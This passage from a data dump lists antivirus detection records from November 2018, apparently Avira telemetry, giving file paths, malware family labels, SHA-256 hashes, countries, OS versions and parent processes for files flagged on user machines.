  Row(detection=Row(filename='driverreviver.exe', filepath='F:\\HBCD\\Programs\\DriverReviver.exe', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cardrecovery.exe', filepath='E:\\HBCD\\Programs\\CardRecovery.exe', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='a8ae308110f729e18a260b3a5211f5410e126fbac7235bc439fb148d7dd241c2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-033320-5ded0fb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-033320-5DED0FB8', filesize=896000, name='TR/Kryptik.cqkbr.#M1.#R1'), hash='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='windowsupdate32.exe', filepath='\\\\?\\C:\\ProgramData\\WindowsUpdater\\WindowsUpdate32.exe', filesize=1600000, name='HEUR/AGEN.1004477.#M1.#R1'), hash='c7d7d681204eba799032f293c34dc6923a94286ac5c59e554a23436055a7ae2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:28:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mcmsstgx.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\MCmsSTgx.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:52:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alonso.exe', filepath='C:\\Program Files (x86)\\Apprentice\\alonso.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='efbb5dc8bb09c6875770d4b43e51aeb97a5b6ff29d81333e8266736432b4b95a', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T00:47:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files (x86)\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ArcGIS\\Desktop10.6\\bin\\ArcGlobe.exe', parentsize=1591352, timestamp='2018-11-02T13:07:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kms10.exe', filepath='\\\\?\\C:\\Windows\\KMS10\\KMS10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_135643c1.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_135643c1.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:07:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eset nod32 antivirus 2018 crack license key.exe', filepath='G:\\ESET NOD32 ANTIVIRUS 2018 CRACK LICENSE KEY.EXE', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='cd19a1613937f7a5122a4248ddab7e2efb80d8b5ce073e75d8845bfad91163e7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674872, timestamp='2018-11-02T13:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='telnet.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-telnet-client_31bf3856ad364e35_6.1.7600.16385_none_b807e788865dfff7\\telnet.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e4225b36e6f698d78e2d5c41faa6b5e70721850d408a43a8752d8d247be9d2fc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1589ea5b_2ccdc779.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1589ea5b_2ccdc779.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:05:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level13.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\LEVEL13.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a7a0fd00806114fe7d21a90490249b6cf7a2850ba6b44579093c538d5ff6d9d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='j:\\اوفس\\office 2007 arabic\\office.ar-sa\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101821-932e6515', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3826eca4\\AVSCAN-20181102-101021-3433F3AC\\AVSCAN-20181102-101821-932E6515', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='as.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\as.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00292f18', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f18', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:20:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T18:02:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151505-35127bb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151505-35127BB1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:15:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=18000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e299bc512258f8496a0867e74bff9824a62157eaa370319a974a11a90412fb59', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T18:55:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.17514_none_78a72e1242e1d8e5\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='f6a31d409e5528233f6c753294e1e9620058f1e944187aa21f6c6a62bc93bc85', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:08:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211609-e9a85b8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17bd2441\\AVSCAN-20181104-211430-DE220191\\AVSCAN-20181104-211609-E9A85B8E', filesize=64000, name='JOKE/IconSwap.1.#M1.#R1'), hash='c06a4c4bcde521bfcab8754f09bf9abf95c177ce212296bbecead5a08bf80eb3', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000085a1', filepath='C:\\Windows\\Temp\\5d4c655f-7a2a-4f9d-a12c-bb8d18e7cc2c\\tmp00000551\\tmp000085a1', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='af662cc958e2e2a8311f3b9308fa5f2815b8240f1ac74c1ed23e416f8adcd80d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.3.915.11577\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:08:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\agm.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\acrobat_sl.exe', parentsize=37232, timestamp='2018-11-04T04:25:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-04T06:36:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085829-862c0870', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085528-6E0DED0D\\AVSCAN-20181104-085829-862C0870', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:58:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141434-7d29f3cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-141434-7D29F3CB', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cookingdash.exe', filepath='\\\\?\\K:\\البومات 2013\\اغانى الثورة\\Evocraft\\cookingdash\\CookingDash.exe', filesize=1856000, name='W32/Sality.AT.#M1.#R1'), hash='eaa587b0c44f0903af5681a4ff22533a9a7feecd4fdec02ebcf3d39542b6720b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:29:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bubbles.scr', filepath='C:\\Windows\\System32\\Bubbles.scr', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='fe9373c258947de6542177be64329e8af9813e15ba4a8b1ca67fdd73ec58fa9a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\VSSVC.exe', parentsize=None, timestamp='2018-11-04T15:20:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-190505-f09831ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190505-F09831EE', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f33b872ff6065b1933e42feb77a79cce291239f63731f6d348a9f23b886879ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F33B872FF6065B1933E42FEB77A79CCE291239F63731F6D348A9F23B886879FF', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='f33b872ff6065b1933e42feb77a79cce291239f63731f6d348a9f23b886879ff', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:24:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125700-a0c3ddf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10311809\\AVSCAN-20181101-125624-9C1A5840\\AVSCAN-20181101-125700-A0C3DDF9', filesize=3968000, name='HEUR/APC.#M1.#R1'), hash='f858fcde6939c722a2343f8b3cca16ea55172e1dfe9968bbc06ef74a7532bc51', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:57:06Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\371A4DC09057826DED411FBDD6671464D66341CF8D4871838D70A1B8D8EE65A4', filesize=4000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:39:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0053987.dll', filepath='g:\\system volume information\\_restore{6428f543-31d7-4f50-a73d-00430e005dd2}\\rp43\\A0053987.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:50:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='E:\\HBCD\\Programs\\RAIDReconstructor.exe', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T08:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:54:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T02:10:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182019-786cdbe1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-181753-5E756B46\\AVSCAN-20181102-182019-786CDBE1', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:20:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stylize - jennifer aniston.exe', filepath='j:\\g t a\\gta..8\\anim\\style\\set\\loog on\\4\\Stylize - Jennifer Aniston.exe', filesize=2752000, name='W32/Neshta.A.#M1.#R1'), hash='63f3a81df894cf8010da25a048d088bb27a4269287115cf365e1b925b9cd6c9f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:40Z'), dt=datetime.date(2018, 11, 2)),
